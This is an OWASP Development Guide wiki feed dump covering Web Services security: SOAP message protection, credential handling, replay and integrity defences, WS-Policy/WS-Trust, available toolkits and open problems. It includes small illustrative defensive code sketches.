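To make the first flavor concrete, a server-side check of a hashed UsernameToken could be sketched as follows (Python; the in-memory user store and nonce cache are illustrative assumptions – a real deployment would back both with persistent, expiring storage):

```python
import base64
import hashlib

USER_STORE = {"alice": "correct horse"}  # hypothetical clear-text store
SEEN_NONCES = set()                      # replay cache (never expires here)

def verify_username_token(user, nonce, created, digest_b64):
    """Recompute Base64(SHA-1(nonce + created + password)) for the
    claimed user and compare; reject unknown users and replayed nonces."""
    password = USER_STORE.get(user)
    if password is None or nonce in SEEN_NONCES:
        return False
    expected = base64.b64encode(
        hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    ).decode("ascii")
    if expected != digest_b64:
        return False
    SEEN_NONCES.add(nonce)  # remember the nonce to block replays
    return True
```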
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java bindings for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS executes its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities – a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply the appropriate message protection measures when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types; the one for security is WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via the trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to a public body; their development is progressing via private collaboration among several companies, although it has been opened up to other participants as well. On the positive side, several interoperability events have been conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business-specific tasks, from taking orders through manufacturing and on to distribution. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is the theory. In practice, there are a lot of obstacles hidden along the way, one of the major ones being security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as user populations tend to change frequently across domains. So, how does a service in domain B decide whether to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means) and that authentication tokens from one domain are acceptable in another. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is conveyed – as would be the case with several large corporations that would like to form a partnership but are reluctant to share customer details. The decision to accept such a request is then based on inter-domain procedures establishing special trust relationships and allowing the exchange of such opaque tokens – an example of Federation relationships. Of these efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most of the existing deployments are closer to POC or internal pilot projects than to real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations that will assess conformance of the incoming SOAP messages to the applicable standards, as well as appropriately secure the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to incorporate them immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what will happen when .NET 2.0 finally sees the light of day. The next release of WSE, 3.0, will coincide with the VS 2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area, and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service and interoperability is a requirement (which is usually the case), then in addition to the questions of security testing, one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers of the need to know these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security, plus WS-Trust with WS-SecureConversation. The latter are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, checking signatures, tokens, etc., before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements, and signing and/or encrypting them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from a broader perspective. An example of such a service is TransactionMinder from the former Netegrity: a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems - in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come with a price, however: the performance and simplicity hold only as long as the user stays within the pre-configured confines of the hardware box. The moment one tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which, presumably, reduces risk through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no amount of theory can match the testing that results from thousands of developers pounding on a standard in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least not without making performance sacrifices. Another consideration in whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, especially since, much of the time, the errors that end users see have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanisms have a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks, since questions of storing, updating, and recovering secret and private keys are, more often than not, inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59464</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59464"/>
				<updated>2009-04-26T11:36:55Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Standards committees */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and to warn about potential roadblocks along the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, regarding them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  let's assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format: one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
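The interchange idea above can be sketched briefly. The sketch below is in Python for compactness; the element names (`quote`, `symbol`, `price`) are invented for illustration and are not part of any standard.

```python
# Publishing stock data as plain XML instead of language-specific
# serialized objects, so that a Java producer and a C# consumer can
# interoperate. Element names here are hypothetical.
import xml.etree.ElementTree as ET

def to_xml(symbol, price):
    quote = ET.Element("quote")
    ET.SubElement(quote, "symbol").text = symbol
    ET.SubElement(quote, "price").text = str(price)
    return ET.tostring(quote, encoding="unicode")

def from_xml(payload):
    quote = ET.fromstring(payload)
    return quote.findtext("symbol"), float(quote.findtext("price"))

payload = to_xml("ACME", 13.37)        # language-neutral wire format
assert from_xml(payload) == ("ACME", 13.37)
```

Any consumer with an XML parser can read `payload`, which is exactly the property the serialized-object and ad-hoc-file approaches lack.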
&lt;br /&gt;
At the simplest level, web services can be seen as specialized web applications that differ mainly at the presentation tier. While web applications typically are HTML-based, web services are XML-based. Interactive users normally access web applications for B2C (business to consumer) transactions, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers in log files (where it can be browsed by anybody) and local caches aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said, the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make conscious trade-offs at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherent risk of disclosure – either by sniffing them during wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or never sent “in the clear” at all. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
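Both points can be illustrated with a short Python sketch: Base64 turns binary credential bytes into XML-safe text, and the digest construction follows the pattern of the WSS UsernameToken profile's PasswordDigest (Base64 of SHA-1 over nonce, creation time, and password), which proves possession of the password without transmitting it. Treat the exact formula as indicative rather than normative.

```python
# Base64 round-trip for a binary token, plus a UsernameToken-style
# password digest that avoids sending the password itself.
import base64
import hashlib

binary_token = bytes(range(16))        # stand-in for X.509/Kerberos bytes
encoded = base64.b64encode(binary_token).decode("ascii")
assert base64.b64decode(encoded) == binary_token   # unambiguously restored

def password_digest(nonce: bytes, created: str, password: str) -> str:
    # PasswordDigest = Base64( SHA-1( nonce + created + password ) )
    raw = hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    return base64.b64encode(raw).decode("ascii")

digest = password_digest(b"\x01\x02\x03\x04", "2005-03-15T09:30:10Z", "s3cret")
```

The server, which knows the password, recomputes the same digest from the transmitted nonce and creation time and compares the two; an eavesdropper sees only the digest.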
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” where the server’s or clients’ clocks drift too far apart, preventing timely message delivery; this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “Do I trust the caller?” and “Did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). An alteration may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms like checksums applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
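As a sketch of the HMAC option, with a hypothetical pre-shared key: unlike a plain checksum, the keyed digest cannot be recomputed by an attacker who alters the message.

```python
# A plain digest can be recomputed by anyone; an HMAC requires the
# shared secret, so tampering becomes detectable.
import hashlib
import hmac

key = b"pre-shared-secret"      # assumed known only to the two parties
message = b"operation=withdraw;amount=100"

tag = hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(key, message, tag):
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)   # constant-time compare

assert verify(key, message, tag)
assert not verify(key, b"operation=withdraw;amount=9000", tag)  # altered
```

The tag travels with the message; the receiver recomputes it and any change to the content (or to the tag) produces a mismatch.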
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. This may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
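The hybrid pattern described above can be sketched structurally. Because the Python standard library ships no block cipher, the "cipher" below is a deliberately toy XOR keystream standing in for something like AES; it shows only the shape of the scheme (a fresh one-time session key encrypts the bulk data, and the small session key is what the asymmetric key would then protect) and must not be used for real protection.

```python
# Toy hybrid-encryption skeleton: symmetric session key for bulk data.
# INSECURE stand-in cipher, for structural illustration only.
import hashlib
import secrets

def keystream(session_key: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while length > len(out):
        out += hashlib.sha256(session_key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def toy_cipher(session_key: bytes, data: bytes) -> bytes:
    stream = keystream(session_key, len(data))
    return bytes(a ^ b for a, b in zip(data, stream))   # XOR: self-inverse

session_key = secrets.token_bytes(32)   # fresh key, discarded after use
ciphertext = toy_cipher(session_key, b"account=12345;amount=100")
# In a real system, session_key itself would now be encrypted with the
# recipient's public (asymmetric) key and sent alongside the ciphertext.
assert toy_cipher(session_key, ciphertext) == b"account=12345;amount=100"
```

The point of the structure is the key lifecycle: the bulk key is cheap to generate and throw away per exchange, while the expensive asymmetric operation touches only 32 bytes.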
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
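The three checks can be sketched as a toy lookup; the dictionaries stand in for the back-end user and policy stores a real Policy Server would consult, and all names are invented for illustration.

```python
# Identification -> authentication -> authorization, in order.
USERS = {"alice": "tok-123"}                     # known identities
ROLES = {"alice": {"reader", "trader"}}          # attributes per identity
POLICY = {"getQuote": {"reader"}, "placeOrder": {"trader"}}

def authorize(caller, token, operation):
    if caller not in USERS:                      # identification
        return False
    if USERS[caller] != token:                   # authentication
        return False
    required = POLICY.get(operation, set())      # authorization
    if not required:
        return False                             # unknown operation: deny
    return not required.isdisjoint(ROLES.get(caller, set()))

assert authorize("alice", "tok-123", "getQuote")
assert not authorize("alice", "wrong-token", "getQuote")
assert not authorize("mallory", "tok-123", "getQuote")
```

Note that each question is answered against a different store, which is why entitlement decisions are usually delegated to a domain-wide Policy Server rather than coded into each Web Service.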
&lt;br /&gt;
